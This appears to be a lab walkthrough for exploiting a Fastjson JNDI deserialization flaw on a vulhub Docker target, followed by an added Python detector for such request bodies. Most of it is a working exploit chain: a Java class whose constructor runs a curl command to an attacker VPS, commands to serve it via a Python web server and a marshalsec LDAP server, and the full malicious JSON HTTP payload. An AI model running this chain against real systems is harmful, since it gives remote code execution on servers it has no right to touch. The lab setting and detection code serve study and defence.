**1. Start the vulhub target**

```shell
docker-compose up -d
```
**2. Operations on the public VPS host**

1. JDK environment (version requirement: ideally below 1.8.0_191; tested successfully with 1.8.0_181). Starting with 8u191 the JVM property `com.sun.jndi.ldap.object.trustURLCodebase` defaults to false, so classes are no longer loaded from the remote codebase that an LDAP reference points to, which is why this step depends on an older build.

```shell
java -version
```

JDK 1.8.0_181 download link
JDK installation
2. Java PoC, saved as Exploit.java

```java
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit {
    // The constructor runs when the class is instantiated by the JNDI lookup.
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec("curl http://VPS主机/Hacker");
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        String line;
        while ((line = reader.readLine()) != null) {
            System.out.println(line);
        }
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}
```
3. Compile Exploit.java to Exploit.class and start a web server in the current directory

```shell
javac Exploit.java
python3 -m http.server
```
4. Download marshalsec-0.0.3-SNAPSHOT-all.jar into the same directory as Exploit.java and start the LDAP server from that directory, replacing VPS_IP with this VPS's own IP address.

marshalsec-0.0.3-SNAPSHOT-all.jar download link

```shell
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://VPS_IP:8000/#Exploit" 9999
```

Note: marshalsec-0.0.3-SNAPSHOT-all.jar, Exploit.java and Exploit.class must be in the same directory, and the server start command must also be run from that directory.
5. Before sending the payload, watch the Apache access log to verify whether the command `curl http://VPS主机/Hacker` is executed.

```shell
tail -f /var/log/apache2/access.log
```
**3. Send the payload**

```http
POST / HTTP/1.1
Host: 192.168.150.143:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 266

{
    "name": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "x": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://VPS_IP:9999/Exploit",
        "autoCommit": true
    }
}
```
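As an added defender-side example (not part of the write-up), the Python below inspects a JSON request body for the pattern the payload above relies on: an `@type` key naming a JNDI-capable gadget class, the `java.lang.Class`/`val` pair that primes the deserializer's type cache, and any string value carrying an ldap:// or rmi:// reference. The gadget list and both sample bodies are constructed here; the `VPS_IP` placeholder is kept from the page.

```python
import json
from urllib.parse import urlsplit

# Gadget classes abused via an "@type" key (only the one from the payload above).
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}
# URL schemes that a JNDI lookup would resolve over the network.
JNDI_SCHEMES = {"ldap", "ldaps", "rmi"}

# Constructed samples: the write-up's payload (placeholder host kept) and a benign body.
SUSPICIOUS_BODY = """{
  "name": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
  "x": {"@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://VPS_IP:9999/Exploit",
        "autoCommit": true}
}"""
BENIGN_BODY = '{"name": "alice", "x": {"dataSourceName": "jdbc:mysql://db/app"}}'


def iter_objects(node, path="$"):
    """Yield (json_path, dict) for every JSON object in a nested document."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from iter_objects(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from iter_objects(item, f"{path}[{i}]")


def inspect_body(raw):
    """Return findings explaining why a JSON body looks like an @type/JNDI
    deserialization attempt; an empty list means nothing matched."""
    try:
        doc = json.loads(raw)
    except ValueError:
        return ["body is not valid JSON"]
    findings = []
    for path, obj in iter_objects(doc):
        typ, val = str(obj.get("@type")), str(obj.get("val"))  # str() keeps lists/None hashable
        if typ in GADGET_CLASSES:
            findings.append(f"{path}: @type names gadget class {typ}")
        if typ == "java.lang.Class" and val in GADGET_CLASSES:
            # java.lang.Class/val pre-loads the gadget into the deserializer's
            # type cache so that a later @type naming it is accepted.
            findings.append(f"{path}: java.lang.Class/val primes cache with {val}")
        for key, value in obj.items():
            if isinstance(value, str) and urlsplit(value).scheme.lower() in JNDI_SCHEMES:
                findings.append(f"{path}.{key}: JNDI reference {value}")
    return findings
```

Run `inspect_body` over request bodies from a WAF or reverse-proxy log; the benign body yields no findings, while the write-up's payload produces three, one per indicator.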